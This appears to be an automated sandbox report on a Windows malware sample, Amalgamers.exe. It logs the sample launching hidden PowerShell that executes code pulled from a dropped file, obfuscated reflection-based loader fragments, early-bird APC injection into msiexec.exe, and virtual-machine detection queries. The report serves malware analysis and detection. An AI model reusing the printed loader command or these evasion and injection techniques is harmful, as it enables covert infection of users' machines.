Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\Amalgamers.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Amalgamers.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kreditforeningers $Pietetslst $Unbeholding), (Afgasning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blighia = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Subfix)), $Layloc).DefineDynamicModule($Woodhole, $false).DefineType($Festforestillingens, $Carnies, [System.MulticastDelegate])$Psych

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Amalgamers.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
Source: C:\Users\user\Desktop\Amalgamers.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Amalgamers.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6001			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3718			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056

Thread sleep time: -3689348814741908s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: msiexec.exe, 00000006.00000002.2878965092.0000000008573000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Amalgamers.exe	API call chain: ExitProcess graph end node			graph_0-3259
Source: C:\Users\user\Desktop\Amalgamers.exe	API call chain: ExitProcess graph end node			graph_0-3252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 6_2_02CC92F0 LdrInitializeThunk,

6_2_02CC92F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3F60000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
